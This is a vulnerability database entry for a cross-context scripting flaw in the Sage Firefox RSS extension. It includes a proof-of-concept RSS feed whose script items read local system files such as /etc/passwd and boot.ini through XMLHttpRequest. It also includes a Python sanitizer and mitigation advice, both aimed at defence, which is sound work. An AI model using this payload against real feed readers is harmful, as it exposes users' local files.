Sage Extension for Firefox "img" Cross-Site Scripting Vulnerability

Vulnerability ID: 1110977    Vulnerability type: Unknown
Published: 2006-09-08    Updated: 2007-01-11
CVE: CVE-2006-6919    CNNVD-ID: CNNVD-200701-140
Platform: Multiple    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/28501
https://www.securityfocus.com/bid/87085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-140
|Vulnerability details
The Sage extension for Firefox, version 1.3.8 and earlier, contains a cross-site scripting vulnerability. A remote attacker can run arbitrary JavaScript in the local context by means of an RSS feed containing an IMG tag; the img tag holds script followed by an extra trailing ">".
|Exploit
source: http://www.securityfocus.com/bid/19928/info

The application is prone to an input-validation vulnerability that allows malicious HTML and script code to be injected before it is used in dynamically generated content.

Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <!-- content:encoded is the RSS 1.0 content module element Sage renders;
       every item carries the same script, differing only in the local file it reads -->
  <channel>
    <title>Cross Context Scripting with Sage</title>

    <item>
      <title>WINDOWS: works with "Allow HTML Tags" off</title>
      <content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/boot.ini"); request.send(); alert(request.responseText); } catch(e) {}</script>
      </content:encoded>
    </item>

    <item>
      <title>WINDOWS: works with "Allow HTML Tags" on</title>
      <content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///C:/boot.ini"); request.send(); alert(request.responseText); } catch(e) {}</script>
      </content:encoded>
    </item>

    <item>
      <title>UNIX: works with "Allow HTML Tags" off</title>
      <content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/passwd"); request.send(); alert(request.responseText); } catch(e) {}</script>
      </content:encoded>
    </item>

    <item>
      <title>UNIX: works with "Allow HTML Tags" on</title>
      <content:encoded>
<script>try { request = new XMLHttpRequest(); request.open("GET", "file:///etc/passwd"); request.send(); alert(request.responseText); } catch(e) {}</script>
      </content:encoded>
    </item>
  </channel>
</rss>
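The reader-side mitigation for the behaviour described above, as an added example that is not Sage's code: a Python allowlist sanitizer that parses an RSS feed shaped like the PoC, discards script elements, event-handler attributes and non-http(s) URLs, and re-escapes text so the trailing ">" trick cannot reopen markup. It goes beyond the page's img case and also covers raw script elements and javascript: links. The content:encoded namespace is the standard RSS 1.0 content module; the allowlist policy and the sample feed are constructed for this example.

```python
"""Allowlist sanitizer for RSS item bodies (added example, not Sage's code)."""
import xml.etree.ElementTree as ET
from html import escape
from html.parser import HTMLParser

CONTENT_NS = "http://purl.org/rss/1.0/modules/content/"  # RSS 1.0 content module

# Constructed policy: tags and attributes the reader will render; everything else is dropped.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = ("http://", "https://")
VOID_TAGS = {"br", "img"}


class FeedSanitizer(HTMLParser):
    """Re-serialises feed HTML keeping only allowlisted markup.

    allow_html=False is what "Allow HTML Tags" off should mean: only escaped
    text survives, so no tag (let alone script) reaches the renderer."""

    def __init__(self, allow_html):
        super().__init__(convert_charrefs=True)
        self.allow_html = allow_html
        self.out = []
        self.skip_depth = 0   # >0 while inside <script>/<style>: their text is discarded
        self.dropped = []     # audit trail of removed tags/attributes

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            self.dropped.append(tag)
            return
        if self.skip_depth:
            return
        if not self.allow_html or tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Event handlers (onerror, onload, ...) and unknown attributes never pass.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")
                continue
            # URL attributes must use a plain web scheme; this rejects javascript: and file:
            if name in ("href", "src") and not value.strip().lower().startswith(SAFE_SCHEMES):
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or not self.allow_html or tag not in ALLOWED_TAGS:
            return
        if tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # Text is re-escaped, so a stray ">" can never re-open markup.
            self.out.append(escape(data))


def item_html(item):
    """Inner HTML of an <item>: content:encoded (CDATA text or raw child
    elements, as in the PoC above), falling back to <description>."""
    body = item.find(f"{{{CONTENT_NS}}}encoded")
    if body is None:
        body = item.find("description")
    if body is None:
        return ""
    parts = [body.text or ""]
    for child in body:
        parts.append(ET.tostring(child, encoding="unicode"))
    return "".join(parts)


def sanitize_feed(xml_text, allow_html=False):
    """Return one dict per item: its title, sanitized HTML and what was dropped."""
    root = ET.fromstring(xml_text)
    results = []
    for item in root.iter("item"):
        parser = FeedSanitizer(allow_html)
        parser.feed(item_html(item))
        parser.close()
        results.append({
            "title": (item.findtext("title") or "").strip(),
            "html": "".join(parser.out),
            "dropped": parser.dropped,
        })
    return results


# Constructed sample feed modelled on the PoC: a raw <script> element, an <img>
# with an event handler plus a trailing ">", and a javascript: link.
SAMPLE_FEED = """<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel><title>constructed sample feed</title>
<item><title>raw script element</title>
<content:encoded><script>try { alert(1) } catch(e) {}</script></content:encoded></item>
<item><title>img with handler and trailing bracket</title>
<content:encoded><![CDATA[<p>hello <img src="https://example.invalid/a.png" onerror="alert(1)">></p>]]></content:encoded></item>
<item><title>javascript link</title>
<content:encoded><![CDATA[<a href="javascript:alert(1)">x</a>]]></content:encoded></item>
</channel></rss>"""

if __name__ == "__main__":
    for mode in (True, False):
        print(f"--- Allow HTML Tags {'on' if mode else 'off'} ---")
        for entry in sanitize_feed(SAMPLE_FEED, allow_html=mode):
            print(entry["title"], "->", repr(entry["html"]), "dropped:", entry["dropped"])
```

Sanitizing the markup is only half of the fix. The PoC works because the feed body is rendered in a local context, where XMLHttpRequest can read local files; a feed reader should additionally render item bodies in an unprivileged content context so that any markup that slips through the filter cannot reach local resources.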
|References

Source: VUPEN
Name: ADV-2006-4426
Link: http://www.frsirt.com/english/advisories/2006/4426
Source: SECUNIA
Name: 22809
Link: http://secunia.com/advisories/22809
Source: XF
Name: sage-img-xss(30179)
Link: http://xforce.iss.net/xforce/xfdb/30179
Source: BUGTRAQ
Name: 20061118 Sage cross-context scripting -> LOCAL-CONTEXT SCRIPTING
Link: http://www.securityfocus.com/archive/1/archive/1/452010/100/0/threaded
Source: MISC
Link: http://michaeldaw.org/md-hacks/rss-injection-in-sage-part-2/